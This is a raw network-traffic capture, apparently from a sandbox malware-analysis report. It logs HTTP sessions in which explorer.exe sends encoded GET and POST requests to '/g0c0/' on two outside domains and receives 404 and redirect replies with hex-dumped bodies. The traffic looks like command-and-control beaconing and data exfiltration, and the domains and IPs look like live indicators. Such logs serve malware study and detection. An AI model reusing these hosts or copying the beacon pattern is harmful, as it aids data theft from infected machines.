Mar 2, 2023 17:21:32.676985025 CET	1161	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Vary: Accept-Encoding host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 7a1af92c9b579b71-FRA Content-Encoding: gzip Data Raw: 33 65 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a4 56 4d 8f db 36 10 3d db bf 62 a2 a2 39 14 95 64 bb 9b 1e b4 b2 83 34 ed a1 40 91 06 d8 16 45 4f 01 25 8e a5 d9 a5 38 2c 49 59 76 8a fc f7 42 22 e5 b5 93 4d 5a a0 27 d9 6f be df 1b 8d 5d 3e fb f1 d7 d7 bf fd f9 f6 27 68 7d a7 76 cb 72 7c 80 12 ba d9 26 a8 d3 df ef 92 dd 72 51 b6 28 e4 6e b9 58 94 1d 7a 01 5a 74 b8 4d 0e 84 83 61 eb 13 a8 59 7b d4 7e 9b 0c 24 7d bb 95 78 a0 1a d3 e9 4b f2 71 94 e5 8a bd bb 88 d1 4c 5a e2 f1 5b d0 bc 67 a5 78 48 20 9f 82 3c 79 85 bb bb 96 0e 42 bb 16 de 60 43 f0 bc 93 c2 b5 b7 f0 9a 3b d2 0d dc 31 eb 32 0f 8e 63 88 ab 2d 19 0f ce d6 db a4 f5 de 14 79 ee 62 bc c6 86 b2 9a bb 7c 30 29 e9 5a f5 12 5d 7e ef f2 fb bf 7a b4 a7 f8 c8 ee 5d b2 2b f3 90 26 64 f4 27 85 e0 4f 06 b7 89 c7 a3 cf 6b e7 92 dd 37 f0 f7 12 00 a0 e2 63 ea e8 3d e9 a6 80 8a ad 44 9b 56 7c bc 9d 6c 69 c7 ef d3 2f 3a 0c 58 3d 90 ff ac cf 87 e5 b2 62 79 9a 4b 89 fa a1 b1 dc 6b 99 d6 ac d8 16 30 b4 e4 31 a4 8a 48 a5 44 fd 10 10 3e a0 dd 2b 1e d2 63 01 2d 49 89 3a e0 9d b0 0d e9 02 56 53 fe af 06 2b 4c 2c 20 14 35 3a 25 8f 9d 2b a0 46 ed d1 86 10 49 ce 28 71 2a 60 af 30 b6 7e df 3b 4f fb 53 1a 45 bc f6 ef 48 a7 2d 52 d3 fa 02 d6 ab d5 a1 9d 4a 65 d1 37 56 1b 73 15 b0 be 6e 4a f4 9e e1 c5 d7 01 34 42 ca 89 93 55 f8 3e b2 9f 4e 4d 7e 54 4e 1c c3 aa 15 70 b3 59 99 40 dc 9e d9 a3 8d b5 a2 75 bd 5a cd a9 d9 91 27 d6 05 ec e9 88 f2 36 6a e9 3d 77 e7 72 0a f7 7e a6 29 66 9b 99 7a aa 93 71 c2 ca eb 4f c4 ba 12 e5 42 43 ea 44 83 05 68 d6 38 97 1f 95 2f 60 6d 8e e0 58 91 bc 0a 1c 57 a4 15 92 87 cb 90 27 f6 a0 b7 6e 84 0c d3 13 fa 91 56 a4 31 ad 14 cf 79 f7 ac fd b8 7b 58 c0 fa c6 1c 2f c0 21 0a 78 b3 9a f9 18 43 cf b2 66 2f 2e 95 4b 3d 9b 91 df 39 c3 59 ba ef cd 11 be 3b c3 9f 53 70 c2 25 d6 6c 45 50 e5 71 44 cf 7d dd a6 a2 0e 78 27 34 99 5e 4d 5e d1 6e 85 9e b5 14 4a c1 2a db 38 40 e1 62 78 ef d0 a6 0e 15 d6 fe 32 eb 01 ad a7 5a a8 b9 99 8e a4 54 d1 36 b1 99 3a 23 ea 49 9e f1 05 09 ea 3a 2f 7c ef d2 0e 9d 13 0d 46 a1 cf dc 86 e4 1f ca 7c 3a 18 e3 e9 58 2c 16 a5 22 fd 00 16 d5 36 99 60 d7 22 fa 04 5a 8b fb 2f de a7 f8 aa e4 46 f5 0d 69 97 57 aa c7 96 9d 4f 07 b6 d2 58 74 2e 0d a6 7c 6c 8a ea bc 9e ce 61 ea 98 75 56 3b f7 f2 b0 dd 64 eb 4d b6 59 c5 5b ba 28 f3 78 c1 cb f1 a4 4c 97 4d d2 01 48 6e 93 71 c2 24 38 75 82 34 d4 4a 38 b7 4d 62 0f 49 1c 65 11 23 a2 d5 f5 55 38 92 c4 fa dd 40 b2 c1 b3 67 d9 ae 77 af e0 0d 0e f0 07 5b f9 76 ec 16 ee c8 e3 b3 32 6f d7 67 9f cd ee e2 84 8f a6 cd 63 a1 d1 41 cc Data Ascii: 3e9VM6=b9d4@EO%8,IYvB"MZ'o]>'h}vr\|&rQ(nXzZtMaY{~$}xKqLZ[gxH <yB`C;12c-yb\|0)Z]~z]+&d'Ok7c=DV\|li/:X=byKk01HD>+c-I:VS+L, 5:%+FI(q`0~;OSEH-RJe7VsnJ4BU>NM~TNpY@uZ'6j=wr~)fzqOBCDh8/`mXW'nV1y{X/!xCf/.K=9Y;Sp%lEPqD}x'4^M^nJ8@bx2ZT6:#I:/\|F\|:X,"6`"Z/FiWOXt.\|lauV;dMY[(xLMHnq$8u4J8MbIe#U8@gw[v2ogcA
Mar 2, 2023 17:21:32.677018881 CET	1162	IN	Data Raw: 95 2a af ff 03 63 8a 1b d2 99 69 cd 63 bf af 64 47 1a 7e 19 0d 31 67 2e ae 6a 4c 90 a4 c3 19 2c f3 91 80 89 9c 19 2f c3 ab 1f e8 31 73 4f d3 c2 86 0d 8e f5 5e 41 29 2e ba 74 45 7e 16 2d b4 38 0b 97 80 17 b6 41 bf 4d de 55 4a e8 87 24 ac 87 66 36 Data Ascii: *cicdG~1g.jL,/1sO^A).tE~-8AMUJ$f6f{vw?T`x@yg%'Tuj=S\WN2[?d
Mar 2, 2023 17:21:32.677037001 CET	1162	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.6	49751	66.235.200.145	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:34.795133114 CET	1162	OUT	GET /g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb HTTP/1.1 Host: www.shivanshnegi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 2, 2023 17:21:35.468508005 CET	1163	IN	HTTP/1.1 301 Moved Permanently Date: Thu, 02 Mar 2023 16:21:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: http://shivanshnegi.com/g0c0/?J1ZahCdL=C0KZfCw3M9dgcVMegUaXT5mHrabIsWwgKIwZghABK/zPnQmv2J3/nbZH+UKlayZCqk+j1NVXNAMuRNCfj24K4Q5P5C8DM0dqWdfKhTZFySIl&uEk=kKVhb1ODb host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ== X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress CF-Cache-Status: MISS Server: cloudflare CF-RAY: 7a1af93c78842c16-FRA Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.6	49752	104.21.67.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:40.559387922 CET	1164	OUT	POST /g0c0/ HTTP/1.1 Host: www.xn--lst4d-fwa.site Connection: close Content-Length: 194 Cache-Control: no-cache Origin: http://www.xn--lst4d-fwa.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xn--lst4d-fwa.site/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 70 55 62 48 4b 43 5a 58 35 69 4c 33 4d 55 45 54 70 39 48 4b 61 69 77 59 38 41 78 69 4e 4e 5a 39 77 2d 63 55 6f 59 6d 4e 45 58 48 55 62 59 51 4c 6b 62 32 77 56 49 43 58 6f 52 56 64 50 79 44 6e 78 69 6c 76 7e 77 6f 7a 53 6e 79 7a 71 43 66 6c 72 69 75 66 66 45 65 36 70 49 34 77 49 55 47 4f 52 4f 58 6d 55 34 34 59 39 30 42 31 35 39 46 78 52 32 39 45 78 33 46 6b 32 57 32 45 70 66 4e 74 39 7a 54 67 78 47 45 47 50 56 79 4c 7a 50 31 50 7e 5f 78 75 74 57 4a 71 42 42 35 7a 5a 36 73 51 56 6e 46 61 76 36 79 48 59 35 37 43 4e 38 45 48 6f 79 31 6e 49 36 45 2e 00 00 00 00 00 00 00 00 Data Ascii: J1ZahCdL=pUbHKCZX5iL3MUETp9HKaiwY8AxiNNZ9w-cUoYmNEXHUbYQLkb2wVICXoRVdPyDnxilv~wozSnyzqCflriuffEe6pI4wIUGOROXmU44Y90B159FxR29Ex3Fk2W2EpfNt9zTgxGEGPVyLzP1P~_xutWJqBB5zZ6sQVnFav6yHY57CN8EHoy1nI6E.
Mar 2, 2023 17:21:40.766362906 CET	1166	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:40 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=tZmuM8kO9G5BfUPHjW0SzPp%2Fe6mpUtDyQo%2BZRpFnv%2B8jxXhM%2BhlgrdGeuuGEevw10juW08Aj5NcPYuCSMsPSiyRhUfywts%2BOQdW4%2BYQmKcQ0O3a4mrtDXKxKELErHPeN%2FUuautK5gHF5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7a1af9608a6d9963-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 53 4d 6f db 38 10 bd fb 57 4c 59 60 4f a5 e5 b8 2d b0 70 25 01 41 92 76 7b 68 52 34 2d b0 3d 8e c4 89 44 98 22 59 72 64 c7 ff be a0 f5 11 27 4d 7b aa 0e 96 c8 79 f3 66 de 9b 71 fe e2 f2 e6 e2 eb f7 cf 57 d0 72 67 ca 45 9e 5e 60 d0 36 85 20 2b d2 05 a1 2a 17 00 00 39 6b 36 54 be 59 bd 81 cf e7 1f ae e0 fa e6 2b bc bf f9 76 7d 99 67 43 64 31 c0 5e 48 09 9f 88 11 a4 1c 13 bb 74 aa 5b 0c 91 b8 10 3d df c9 7f c5 69 a8 65 f6 92 7e f4 7a 57 88 ff e5 b7 73 79 e1 3a 8f ac 2b 43 02 6a 67 99 2c 17 e2 e3 55 41 aa a1 47 99 73 70 af 15 b7 c5 d9 7a b5 7a 05 da 6a d6 68 64 ac d1 50 71 26 c0 62 47 85 d8 69 da 7b 17 78 22 48 7d 3e 61 99 21 cf 11 8b f2 a9 a2 09 33 55 50 14 eb a0 3d 6b 67 c5 1f 81 d8 73 eb 82 38 75 ec 3d ee 74 ed ec 43 09 a3 ed 16 02 99 42 c4 d6 05 ae 7b 86 04 10 d0 06 ba 2b c4 dd 80 5f ea da 3d e2 b9 b8 bd 85 0f c6 55 68 20 b9 d8 9b e8 c2 e1 59 56 3e 18 8a 2d 11 4f 94 75 8c 59 e5 1c 47 0e e8 97 7b aa 96 9d b6 cb 3a c6 51 cc 09 c3 43 42 a0 e8 9d 8d 7a 47 29 21 81 7f a5 e7 83 a7 42 30 dd 73 36 b0 e5 d9 b0 56 79 e5 d4 a1 5c 2c 72 8b 3b a8 0d c6 58 08 8b bb 0a c3 b1 64 ae f4 7c 9d 3c 44 6d 29 4c ce 9e c4 86 14 99 38 e7 38 40 5e f5 cc ce 8e d5 87 83 78 92 c2 ae 69 d2 92 29 64 1c 0f a9 94 31 e8 e3 7c 8d a1 49 7b fb b2 3b 5c 3f f4 36 d6 88 1e ed c4 99 e6 21 8f f1 3c 4b f7 7f 19 06 bf 79 26 b9 d9 20 71 96 8f 4f b4 56 01 ad 9a 66 fd 52 3c fb 47 c6 d1 dc 4c e9 dd 71 02 c3 47 9e 59 3c 9e 17 bf 1b c9 10 d0 aa 10 ac eb 2d 85 d9 e8 3d 19 03 e9 47 c6 4e c0 71 2b 0a d1 61 68 b4 95 95 63 76 dd e6 ec ad bf 7f 07 1e 95 d2 b6 91 ec fc 06 1e dd 8c b0 b5 bf 17 65 de 61 f8 d1 13 95 83 57 a9 60 15 1c aa 1a 23 8b f2 3f 34 d8 a1 05 d6 0a b7 a0 34 53 d7 6f d1 8e 06 e6 d9 9c 3c ca 3a 11 13 dc 1e d2 86 ca 9a 2c a7 fe c7 56 5b d2 4d cb 9b d7 ab 55 2a bf c8 db f5 94 71 44 ef 31 58 6d 9b 3f 94 6e d7 e5 e2 56 1b dc a2 85 2d 75 15 1a 0d 5b 4a e3 19 26 91 69 ab e8 7e e9 5b ff 40 72 49 3e a5 62 72 7e 1c c0 2f 0d 9f 1a 0b f3 28 e4 Data Ascii: 2cdSMo8WLY`O-p%Av{hR4-=D"Yrd'M{yfqWrgE^`6 +9k6TY+v}gCd1^Ht[=ie~zWsy:+Cjg,UAGspzzjhdPq&bGi{x"H}>a!3UP=kgs8u=tCB{+_=Uh YV>-OuYG{:QCBzG)!B0s6Vy\,r;Xd\|<Dm)L88@^xi)d1\|I{;\?6!<Ky& qOVfR<GLqGY<-=GNq+ahcveaW`#?44So<:,V[MUqD1Xm?nV-u[J&i~[@rI>br~/(
Mar 2, 2023 17:21:40.766437054 CET	1166	IN	Data Raw: 9d e9 b5 7a 56 c9 60 fa 66 75 62 ed e6 e8 73 e5 82 a2 20 03 2a dd c7 cd 51 e7 3f b5 f3 87 77 b0 5e 9d bd 85 0b e7 0f 21 99 b0 84 73 63 e0 4b fa 8c f0 85 22 85 1d a9 e5 d0 da 4f 00 00 00 ff ff 0d 0a Data Ascii: zV`fubs *Q?w^!scK"O
Mar 2, 2023 17:21:40.766457081 CET	1166	IN	Data Raw: 61 0d 0a 03 00 09 5f c9 a2 49 06 00 00 0d 0a Data Ascii: a_I
Mar 2, 2023 17:21:40.766474009 CET	1166	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.6	49753	104.21.67.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 2, 2023 17:21:43.112483978 CET	1168	OUT	POST /g0c0/ HTTP/1.1 Host: www.xn--lst4d-fwa.site Connection: close Content-Length: 1458 Cache-Control: no-cache Origin: http://www.xn--lst4d-fwa.site User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.xn--lst4d-fwa.site/g0c0/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 4a 31 5a 61 68 43 64 4c 3d 70 55 62 48 4b 43 5a 58 35 69 4c 33 4f 77 34 54 35 75 76 4b 64 43 77 58 33 67 78 69 44 74 5a 35 77 2d 67 55 6f 5a 6a 57 46 6b 72 55 65 59 67 4c 6b 35 75 77 58 49 43 58 28 68 56 5a 43 53 44 39 78 69 78 64 7e 30 73 6a 53 69 4b 7a 6c 45 50 6c 76 51 47 51 48 45 65 34 6a 6f 35 6d 49 55 48 55 52 4b 7a 59 55 37 56 39 39 30 5a 31 36 49 5a 78 54 47 39 44 74 6e 46 6b 32 57 32 59 70 66 4d 2d 39 33 48 43 78 48 73 73 4f 6a 65 4c 7a 72 35 50 38 63 70 74 6c 32 4a 78 66 52 34 46 55 35 51 59 5a 6b 46 61 68 4b 53 57 50 4c 71 75 57 5f 42 62 37 52 35 30 54 4c 43 4b 54 6c 39 41 28 5a 54 62 75 6d 44 4b 68 49 75 41 4e 68 57 76 4b 42 6b 45 33 6a 6e 4c 6d 2d 4d 6b 65 61 6f 39 4e 43 46 69 4c 7a 48 72 35 65 7e 73 4f 5a 42 46 73 34 49 77 68 72 47 75 7a 54 50 58 35 72 44 46 37 47 4e 55 6b 58 44 36 6a 42 41 4e 45 4e 68 30 34 44 4b 56 78 57 51 41 34 56 55 52 47 5f 68 6a 30 66 4b 52 46 74 57 31 4e 69 69 73 78 58 44 63 35 6f 45 41 4c 5f 67 79 35 4d 30 71 77 59 35 35 4e 79 4f 36 77 35 43 6f 54 56 52 4c 32 73 69 44 45 6a 33 72 79 5f 35 70 59 6c 4f 32 61 54 6c 70 5a 6b 4e 46 5a 55 34 31 7a 69 56 4c 44 52 46 46 52 56 63 61 56 69 72 46 54 5f 66 2d 4c 4e 71 6b 6c 44 37 76 68 6c 55 71 75 52 57 70 58 35 74 67 75 75 44 35 44 4d 34 70 63 50 49 73 72 6c 78 64 56 59 74 32 64 73 45 4a 6c 37 6d 52 6b 4a 6d 4e 4c 78 5a 72 44 65 35 2d 56 44 6f 43 67 4a 41 48 47 5f 30 31 70 74 31 4e 44 78 38 76 4a 41 42 54 7a 51 50 73 56 59 47 59 33 45 6e 6c 78 42 45 64 6d 76 52 4b 76 37 75 64 7a 47 54 54 58 68 66 77 4a 6c 28 64 63 4f 74 2d 74 77 53 33 6f 7a 65 64 48 50 7e 63 33 53 7a 6c 53 4d 4d 48 77 38 70 55 4d 4a 42 68 32 56 57 48 33 32 4f 4e 78 77 4b 5a 66 63 6c 64 53 73 44 45 4c 63 4b 4c 6c 38 72 43 59 30 71 5f 76 6e 6f 42 65 34 58 72 5a 4c 7e 61 33 76 75 65 55 71 66 35 70 34 37 38 6f 67 44 54 71 31 54 30 78 63 78 43 72 39 49 45 38 4a 55 57 38 46 6a 30 6b 39 55 47 54 55 58 55 32 5a 35 2d 4f 5a 76 65 77 71 28 34 6f 5a 57 6d 56 50 63 6d 45 79 36 6d 36 76 52 75 57 4d 70 51 69 33 43 62 75 43 35 42 48 77 7a 59 75 68 4b 37 65 71 7e 4d 74 4e 58 49 75 46 51 6f 62 44 62 38 28 56 46 31 4f 4a 4c 52 6b 32 74 55 63 63 49 68 43 5a 4a 49 54 4b 6c 55 56 52 47 6a 54 77 71 45 75 5a 34 41 37 57 58 7a 65 43 79 62 50 49 4d 6a 28 61 4b 64 32 70 67 55 5a 4f 58 39 54 44 28 67 4e 42 69 4d 58 79 37 30 62 64 42 49 58 70 31 53 69 76 78 78 65 6d 51 4f 43 31 65 6b 4d 42 67 72 4c 55 37 70 64 62 65 62 75 74 53 42 4d 71 4d 32 4d 77 4e 6c 44 6b 76 36 71 43 53 6e 55 77 70 42 4f 4a 30 39 68 42 43 4a 76 38 43 70 4c 63 39 2d 48 57 34 51 78 71 32 33 78 53 52 39 50 73 79 66 44 75 4a 48 4d 31 66 52 33 6e 51 51 46 65 68 39 49 57 71 73 64 49 61 56 32 47 6d 6b 44 75 33 42 78 43 51 4a 78 6f 42 72 31 6e 61 38 79 75 62 77 32 42 6c 73 33 63 72 6b 28 47 70 59 4e 47 75 50 7e 54 47 44 36 75 6c 38 41 56 48 78 7e 79 66 71 72 62 50 43 43 79 44 44 62 73 49 52 33 4c 76 75 49 70 57 53 33 56 57 53 72 4c 4f 64 4c 64 43 6a 4d 53 6e 78 66 38 50 6e 58 71 6a 46 6f 59 6a 7a 28 50 6b 75 77 62 68 4c 45 75 41 47 49 67 39 6e 79 57 6a 52 28 37 39 4a 59 57 61 30 59 33 67 57 64 62 48 6a 78 6c 34 49 28 38 44 70 35 63 50 6d 33 6f 59 44 61 53 55 71 33 2d 30 4a 4e 42 57 43 67 34 78 58 39 52 4c 55 47 33 6c 41 69 69 67 6d 43 4a 62 7a 71 38 76 46 77 64 6e 5f 6f 4b 78 67 72 74 74 67 6a 64 41 45 69 58 30 50 33 53 4a 56 6f 38 59 67 43 63 77 54 4b 35 66 5a 48 33 7e 6d 57 36 71 54 63 77 75 4d 62 32 33 54 6b 78 61 43 58 44 62 70 6c 33 30 6d 71 57 63 6b 47 62 32 77 63 4a 43 42 77 43 37 58 5a 50 28 32 5a 73 4b 55 46 48 44 30 61 75 6f 34 78 54 30 54 54 5a 7a 31 4d 58 35 76 4e 62 51 76 48 31 53 4e 53 79 50 57 46 62 69 79 4d 58 4b 4c 49 64 35 48 69 59 58 43 52 61 38 46 5a 66 6e 51 32 70 4f 6f 42 74 78 6b 44 37 69 71 54 56 5a 6c 6c 55 55 46 45 74 48 65 55 4d 78 4e 63 46 74 6d 43 63 70 62 50 30 35 49 69 5a 34 45 43 57 45 5a 4b 42 5a 4e 6e 52 51 5a 35 58 4d 4f 57 74 70 46 6f 4d 6c 4c 37 6d 36 77 4f 68 4a 68 31 4b 42 38 6a 79 65 49 46 32 76 62 45 62 4e 72 52 76 66 47 42 42 52 43 34 4a 6b 30 52 68 71 76 7a 6a 28 45 6b 77 4e 66 28 4f 6b 58 51 41 32 4c 62 6f 4c 6e 4c 68 56 65 62 53 51 62 28 46 50 41 58 72 74 48 78 49 39 78 57 68 46 62 6a 76 Data Ascii: J1ZahCdL=pUbHKCZX5iL3Ow4T5uvKdCwX3gxiDtZ5w-gUoZjWFkrUeYgLk5uwXICX(hVZCSD9xixd~0sjSiKzlEPlvQGQHEe4jo5mIUHURKzYU7V990Z16IZxTG9DtnFk2W2YpfM-93HCxHssOjeLzr5P8cptl2JxfR4FU5QYZkFahKSWPLquW_Bb7R50TLCKTl9A(ZTbumDKhIuANhWvKBkE3jnLm-Mkeao9NCFiLzHr5e~sOZBFs4IwhrGuzTPX5rDF7GNUkXD6jBANENh04DKVxWQA4VURG_hj0fKRFtW1NiisxXDc5oEAL_gy5M0qwY55NyO6w5CoTVRL2siDEj3ry_5pYlO2aTlpZkNFZU41ziVLDRFFRVcaVirFT_f-LNqklD7vhlUquRWpX5tguuD5DM4pcPIsrlxdVYt2dsEJl7mRkJmNLxZrDe5-VDoCgJAHG_01pt1NDx8vJABTzQPsVYGY3EnlxBEdmvRKv7udzGTTXhfwJl(dcOt-twS3ozedHP~c3SzlSMMHw8pUMJBh2VWH32ONxwKZfcldSsDELcKLl8rCY0q_vnoBe4XrZL~a3vueUqf5p478ogDTq1T0xcxCr9IE8JUW8Fj0k9UGTUXU2Z5-OZvewq(4oZWmVPcmEy6m6vRuWMpQi3CbuC5BHwzYuhK7eq~MtNXIuFQobDb8(VF1OJLRk2tUccIhCZJITKlUVRGjTwqEuZ4A7WXzeCybPIMj(aKd2pgUZOX9TD(gNBiMXy70bdBIXp1SivxxemQOC1ekMBgrLU7pdbebutSBMqM2MwNlDkv6qCSnUwpBOJ09hBCJv8CpLc9-HW4Qxq23xSR9PsyfDuJHM1fR3nQQFeh9IWqsdIaV2GmkDu3BxCQJxoBr1na8yubw2Bls3crk(GpYNGuP~TGD6ul8AVHx~yfqrbPCCyDDbsIR3LvuIpWS3VWSrLOdLdCjMSnxf8PnXqjFoYjz(PkuwbhLEuAGIg9nyWjR(79JYWa0Y3gWdbHjxl4I(8Dp5cPm3oYDaSUq3-0JNBWCg4xX9RLUG3lAiigmCJbzq8vFwdn_oKxgrttgjdAEiX0P3SJVo8YgCcwTK5fZH3~mW6qTcwuMb23TkxaCXDbpl30mqWckGb2wcJCBwC7XZP(2ZsKUFHD0auo4xT0TTZz1MX5vNbQvH1SNSyPWFbiyMXKLId5HiYXCRa8FZfnQ2pOoBtxkD7iqTVZllUUFEtHeUMxNcFtmCcpbP05IiZ4ECWEZKBZNnRQZ5XMOWtpFoMlL7m6wOhJh1KB8jyeIF2vbEbNrRvfGBBRC4Jk0Rhqvzj(EkwNf(OkXQA2LboLnLhVebSQb(FPAXrtHxI9xWhFbjv7YzwcBGd(Tn7R2(PB1ZB(GGFSJDRA1RdiW(cvShHrcmB3-Z0s_4pOgDbBftLMMKCin1bqedRXTwFH-~EGDdifiaMv0uu4.
Mar 2, 2023 17:21:43.323788881 CET	1170	IN	HTTP/1.1 404 Not Found Date: Thu, 02 Mar 2023 16:21:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QEKNfZ7TnCraq6cZGlwZ3y%2Fj3Q%2F4pIi33GA%2BnLo64EkocwUdV0F6ZzV0%2B1hCKlYtsl0bVA4xlhWAE57ulsoivUAF6ykVL2i%2FRfUfQ7V3Pa05B7xWK0r4gdHhcmFzKuhlPrV7ud4oReZc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7a1af97079699b46-FRA Content-Encoding: gzip alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 32 63 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ac 53 4d 6f db 38 10 bd fb 57 4c 59 60 4f a5 e5 b8 2d b0 70 25 01 41 92 76 7b 68 52 34 2d b0 3d 8e c4 89 44 98 22 59 72 64 c7 ff be a0 f5 11 27 4d 7b aa 0e 96 c8 79 f3 66 de 9b 71 fe e2 f2 e6 e2 eb f7 cf 57 d0 72 67 ca 45 9e 5e 60 d0 36 85 20 2b d2 05 a1 2a 17 00 00 39 6b 36 54 be 59 bd 81 cf e7 1f ae e0 fa e6 2b bc bf f9 76 7d 99 67 43 64 31 c0 5e 48 09 9f 88 11 a4 1c 13 bb 74 aa 5b 0c 91 b8 10 3d df c9 7f c5 69 a8 65 f6 92 7e f4 7a 57 88 ff e5 b7 73 79 e1 3a 8f ac 2b 43 02 6a 67 99 2c 17 e2 e3 55 41 aa a1 47 99 73 70 af 15 b7 c5 d9 7a b5 7a 05 da 6a d6 68 64 ac d1 50 71 26 c0 62 47 85 d8 69 da 7b 17 78 22 48 7d 3e 61 99 21 cf 11 8b f2 a9 a2 09 33 55 50 14 eb a0 3d 6b 67 c5 1f 81 d8 73 eb 82 38 75 ec 3d ee 74 ed ec 43 09 a3 ed 16 02 99 42 c4 d6 05 ae 7b 86 04 10 d0 06 ba 2b c4 dd 80 5f ea da 3d e2 b9 b8 bd 85 0f c6 55 68 20 b9 d8 9b e8 c2 e1 59 56 3e 18 8a 2d 11 4f 94 75 8c 59 e5 1c 47 0e e8 97 7b aa 96 9d b6 cb 3a c6 51 cc 09 c3 43 42 a0 e8 9d 8d 7a 47 29 21 81 7f a5 e7 83 a7 42 30 dd 73 36 b0 e5 d9 b0 56 79 e5 d4 a1 5c 2c 72 8b 3b a8 0d c6 58 08 8b bb 0a c3 b1 64 ae f4 7c 9d 3c 44 6d 29 4c ce 9e c4 86 14 99 38 e7 38 40 5e f5 cc ce 8e d5 87 83 78 92 c2 ae 69 d2 92 29 64 1c 0f a9 94 31 e8 e3 7c 8d a1 49 7b fb b2 3b 5c 3f f4 36 d6 88 1e ed c4 99 e6 21 8f f1 3c 4b f7 7f 19 06 bf 79 26 b9 d9 20 71 96 8f 4f b4 56 01 ad 9a 66 fd 52 3c fb 47 c6 d1 dc 4c e9 dd 71 02 c3 47 9e 59 3c 9e 17 bf 1b c9 10 d0 aa 10 ac eb 2d 85 d9 e8 3d 19 03 e9 47 c6 4e c0 71 2b 0a d1 61 68 b4 95 95 63 76 dd e6 ec ad bf 7f 07 1e 95 d2 b6 91 ec fc 06 1e dd 8c b0 b5 bf 17 65 de 61 f8 d1 13 95 83 57 a9 60 15 1c aa 1a 23 8b f2 3f 34 d8 a1 05 d6 0a b7 a0 34 53 d7 6f d1 8e 06 e6 d9 9c 3c ca 3a 11 13 dc 1e d2 86 ca 9a 2c a7 fe c7 56 5b d2 4d cb 9b d7 ab 55 2a bf c8 db f5 94 71 44 ef 31 58 6d 9b 3f 94 6e d7 e5 e2 56 1b dc a2 85 2d 75 15 1a 0d 5b 4a e3 19 26 91 69 ab e8 7e e9 5b ff 40 72 49 3e a5 62 72 7e 1c c0 2f 0d 9f 1a 0b f3 28 e4 9d e9 b5 7a Data Ascii: 2cdSMo8WLY`O-p%Av{hR4-=D"Yrd'M{yfqWrgE^`6 +9k6TY+v}gCd1^Ht[=ie~zWsy:+Cjg,UAGspzzjhdPq&bGi{x"H}>a!3UP=kgs8u=tCB{+_=Uh YV>-OuYG{:QCBzG)!B0s6Vy\,r;Xd\|<Dm)L88@^xi)d1\|I{;\?6!<Ky& qOVfR<GLqGY<-=GNq+ahcveaW`#?44So<:,V[MUqD1Xm?nV-u[J&i~[@rI>br~/(z
Mar 2, 2023 17:21:43.323815107 CET	1170	IN	Data Raw: 56 c9 60 fa 66 75 62 ed e6 e8 73 e5 82 a2 20 03 2a dd c7 cd 51 e7 3f b5 f3 87 77 b0 5e 9d bd 85 0b e7 0f 21 99 b0 84 73 63 e0 4b fa 8c f0 85 22 85 1d a9 e5 d0 da 4f 00 00 00 ff ff 0d 0a Data Ascii: V`fubs *Q?w^!scK"O
Mar 2, 2023 17:21:43.323828936 CET	1170	IN	Data Raw: 61 0d 0a 03 00 09 5f c9 a2 49 06 00 00 0d 0a Data Ascii: a_I
Mar 2, 2023 17:21:43.323837996 CET	1170	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.6	49754	104.21.67.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
